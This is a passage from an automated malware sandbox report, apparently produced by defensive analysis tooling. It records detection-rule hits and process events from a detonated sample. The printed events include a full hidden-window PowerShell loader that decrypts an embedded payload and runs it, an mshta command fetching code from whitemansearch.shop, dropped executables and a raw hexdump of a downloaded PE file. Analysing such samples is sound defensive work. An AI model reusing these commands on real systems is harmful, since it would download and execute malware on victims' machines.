'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOd
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOd
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOd
              Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: 29026\Identification.pif 29026\m , CommandLine: 29026\Identification.pif 29026\m , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Avoid Avoid.bat & Avoid.bat & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 748, ParentProcessName: cmd.exe, ProcessCommandLine: 29026\Identification.pif 29026\m , ProcessId: 8272, ProcessName: Identification.pif
              Source: Process startedAuthor: Hieu Tran: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOd
              Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7488, TargetFilename: C:\Users\user\AppData\Roaming\ClassroomEc.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: start mshta http://whitemansearch.shop/setup, CommandLine: start mshta http://whitemansearch.shop/setup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://whitemansearch.shop/setup, ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 4320, ParentProcessName: forfiles.exe, ProcessCommandLine: start mshta http://whitemansearch.shop/setup, ProcessId: 4672, ProcessName: powershell.exe
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7292, ProcessName: svchost.exe
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              Source: https://2no.co/2ZrVm4;Set-ItemPropertyAvira URL Cloud: Label: malware
              Source: https://2no.co/2ZrVm4Avira URL Cloud: Label: malware
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeReversingLabs: Detection: 28%
              Source: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGK3X1K4GIjCs5bmnU-QRgcCxGGYio4gxMIxzCz8oSx53B1g933onepuWbALDDhFc9jBNVv2Q5b8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMHTTP Parser: No favicon
              Source: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGK3X1K4GIjCs5bmnU-QRgcCxGGYio4gxMIxzCz8oSx53B1g933onepuWbALDDhFc9jBNVv2Q5b8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMHTTP Parser: No favicon
              Source: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGK3X1K4GIjCs5bmnU-QRgcCxGGYio4gxMIxzCz8oSx53B1g933onepuWbALDDhFc9jBNVv2Q5b8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMHTTP Parser: No favicon
              Source: https://www.google.com/recaptcha/api2/bframe?hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1bHTTP Parser: No favicon
              Source: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b&co=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbTo0NDM.&hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&size=normal&s=lWQi8XFYJHLFBSoU5SiD8DreLMbLqyaMWILUp5KCz1F35zWomRvT9ZsLyU2pNy3cJT6ktzRP5y17XcMG-do_3Wz9iewnxFuXO9-Rn8pvEh73KR_ICtSbe2Z6e_Ei5_nwQyOLl8qvlYvQk4daw9H_NvC1gU1QG5NpYFKB5attDgP678B_k9rlXBPBo2eoAqVFlZ1Em14eX_80yS-dPAqW96lMh_xfWdLzYUhZtjmAdlCguJrDRQwMm7Rczgjwz-ZdX4GSGDCvHFQ8Zn5X9oOgweVqfE-fbaY&cb=yulbx0ey1rifHTTP Parser: No favicon
              Source: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b&co=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbTo0NDM.&hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&size=normal&s=lWQi8XFYJHLFBSoU5SiD8DreLMbLqyaMWILUp5KCz1F35zWomRvT9ZsLyU2pNy3cJT6ktzRP5y17XcMG-do_3Wz9iewnxFuXO9-Rn8pvEh73KR_ICtSbe2Z6e_Ei5_nwQyOLl8qvlYvQk4daw9H_NvC1gU1QG5NpYFKB5attDgP678B_k9rlXBPBo2eoAqVFlZ1Em14eX_80yS-dPAqW96lMh_xfWdLzYUhZtjmAdlCguJrDRQwMm7Rczgjwz-ZdX4GSGDCvHFQ8Zn5X9oOgweVqfE-fbaY&cb=yulbx0ey1rifHTTP Parser: No favicon
              Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.5:49733 version: TLS 1.2
              Source: Binary string: calc.pdbGCTL source: mshta.exe, 00000004.00000002.2039404857.00000278B7457000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2027635373.00000278B7456000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2024473416.00000278B74BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2026956096.00000278B74BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2024473416.00000278B7461000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2030741476.00000278B7456000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2027458057.00000278B74CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2027587413.00000278B74D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2036185120.00000278B7457000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2027168564.00000278B7455000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2024473416.00000278B744F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2024473416.00000278B73E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2026299956.00000278B746A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wkernel32.pdb source: Identification.pif, 00000019.00000003.2989835694.0000000001E20000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: wkernelbase.pdb source: Identification.pif, 00000019.00000003.2990376919.0000000004BE0000.00000004.00000001.00020000.00000000.sdmp, Identification.pif, 00000019.00000003.2990182254.0000000001E20000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: ntdll.pdb source: Identification.pif, 00000019.00000003.2988525996.0000000002010000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: e.pdb`] source: powershell.exe, 00000008.00000002.2239404211.0000023DA295C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: calc.pdb source: mshta.exe, 00000004.00000003.2024473416.00000278B74BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2026956096.00000278B74BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2024473416.00000278B7461000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2027458057.00000278B74CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2027587413.00000278B74D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2026299956.00000278B746A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ntdll.pdbUGP source: Identification.pif, 00000019.00000003.2988525996.0000000002010000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: wkernel32.pdbUGP source: Identification.pif, 00000019.00000003.2989835694.0000000001E20000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: wkernelbase.pdbUGP source: Identification.pif, 00000019.00000003.2990376919.0000000004BE0000.00000004.00000001.00020000.00000000.sdmp, Identification.pif, 00000019.00000003.2990182254.0000000001E20000.00000004.00000001.00020000.00000000.sdmp
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 12_2_00D65080 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,12_2_00D65080
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 12_2_00D63C80 FindFirstFileW,FindClose,SetLastError,CompareFileTime,12_2_00D63C80
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 12_2_00D64ED0 _DebugHeapAllocator,FindFirstFileW,_DebugHeapAllocator,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,12_2_00D64ED0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

              Networking

              barindex
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx-reuseport/1.21.1Date: Tue, 20 Feb 2024 22:46:06 GMTContent-Type: application/octet-streamContent-Length: 1212711Last-Modified: Tue, 20 Feb 2024 15:43:47 GMTConnection: keep-aliveKeep-Alive: timeout=30ETag: "65d4c8b3-128127"Expires: Thu, 21 Mar 2024 22:46:06 GMTCache-Control: max-age=2592000Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 1f 00 94 82 5b 61 fa d1 5b 61 fa d1 5b 61 fa d1 52 19 7e d1 59 61 fa d1 52 19 6f d1 5c 61 fa d1 52 19 79 d1 4d 61 fa d1 52 19 69 d1 4a 61 fa d1 5b 61 fb d1 98 61 fa d1 34 17 64 d1 59 61 fa d1 34 17 50 d1 5f 61 fa d1 34 17 51 d1 6a 61 fa d1 34 17 60 d1 5a 61 fa d1 34 17 67 d1 5a 61 fa d1 52 69 63 68 5b 61 fa d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b3 be 2e 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 7a 02 00 00 ba 00 00 00 00 00 00 f8 7b 02 00 00 10 00 00 00 90 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 03 00 00 04 00 00 f5 8d 12 00 03 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 b5 02 00 b4 00 00 00 00 00 03 00 51 40 00 00 00 00 00 00 00 00 00 00 3f 59 12 00 e8 27 00 00 00 50 03 00 38 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 02 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1f 78 02 00 00 10 00 00 00 7a 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 